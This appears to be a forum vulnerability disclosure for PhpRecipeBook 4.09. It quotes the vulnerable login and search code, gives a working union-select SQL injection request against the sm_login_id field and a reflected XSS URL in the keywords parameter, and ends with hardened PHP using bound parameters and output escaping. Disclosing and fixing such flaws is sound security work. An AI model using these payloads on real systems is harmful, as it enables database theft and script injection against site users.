
06.05.2014, 15:36
PhpRecipeBook 4.09
SQL injection
Vulnerable POST parameter: sm_login_id
Dependencies: mq = off
Vector: union-query
Vulnerable code:
PHP code:
$sm_login_id = isset($_POST['sm_login_id']) ? $_POST['sm_login_id'] : '';
$sm_password = isset($_POST['sm_password']) ? $_POST['sm_password'] : '';
if ($sm_login_id != "") {
    // try login if they are passing us a login ID
    if (!$SMObj->login($sm_login_id, $sm_password)) {
        $SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.'));
    }
}
The login function:
PHP code:
function login($login = '', $password = '') {
    if ($login == "" && $login == "") {
        $login = $this->_autoLoginUser;
        $password = $this->_autoLoginPasswd;
    }
    $sql = "SELECT * FROM " . $this->_db_table_prefix . $this->_db_table_users .
        " WHERE user_login = '$login' AND user_password = '" . md5($password) . "'";
Exploit:
POST /phprecipebook/index.php HTTP/1.1
Host: 127.0.0.1
...
sm_login_id='union select concat_ws(0x3a,version(),database(),user()),2,3,4, 5,6,7,8,9,10+--+
&sm_password=antichat
Passive XSS (reflected)
Vulnerable parameter: keywords
Dependencies: mq = off
Vulnerable code:
PHP code:
">
Exploit:
127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords= ">alert('Antichat')&search=yes
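The two fixes a reviewer would ask for on the code quoted in the post above, as an added example that is neither the post author's code nor PhpRecipeBook's own: the login query rewritten with a bound parameter, so a quote or a "union select" inside sm_login_id is data whether magic_quotes is on or off, and the reflected keywords value escaped at the point where it is written into HTML. The class name SessionManagerHardened, the PDO connection passed to it, the table prefix and table name, and the password_hash() storage format are assumptions (the original stores unsalted md5() hashes).

```php
<?php
// Added example, not PhpRecipeBook's own code. Assumes a PDO connection is
// injected and that table names come from configuration, as in the quoted login().

class SessionManagerHardened
{
    private PDO $_pdo;
    private string $_db_table_prefix = 'prb_';   // assumed prefix
    private string $_db_table_users  = 'users';  // assumed table name

    public function __construct(PDO $pdo)
    {
        $this->_pdo = $pdo;
        // Throw on errors so a failed query cannot silently look like "no such user".
        $this->_pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        // Use real server-side prepares rather than client-side quoting.
        $this->_pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    }

    public function login(string $login, string $password): bool
    {
        if ($login === '') {
            return false;
        }
        // Identifiers cannot be bound as parameters, so the table name must come
        // from trusted configuration and is sanity-checked here, never from the request.
        $table = $this->_db_table_prefix . $this->_db_table_users;
        if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
            throw new RuntimeException('unsafe table name in configuration');
        }

        // The user-supplied login is a bound parameter: it cannot change the
        // structure of the query, so the union-query vector from the post no longer applies.
        $stmt = $this->_pdo->prepare(
            "SELECT user_id, user_login, user_password FROM {$table} WHERE user_login = :login"
        );
        $stmt->execute([':login' => $login]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row === false) {
            return false;
        }

        // Compare against a password_hash() value instead of an unsalted md5().
        return password_verify($password, $row['user_password']);
    }
}

// Reflected output: escape once, where the value enters HTML. With ENT_QUOTES the
// double quote that closes the attribute in the post's XSS vector becomes &quot;.
function renderSearchBox(string $keywords): string
{
    $safe = htmlspecialchars($keywords, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="keywords" value="' . $safe . '">';
}

// Constructed input in the shape of the post's vector; the output contains no live markup.
echo renderSearchBox('"><i>Antichat</i>'), PHP_EOL;
// <input type="text" name="keywords" value="&quot;&gt;&lt;i&gt;Antichat&lt;/i&gt;">
```

Both fixes are independent of magic_quotes, which is the dependency the post lists for each issue: parameter binding and output encoding work the same whether the directive is on or off, and neither relies on stripping characters from the input.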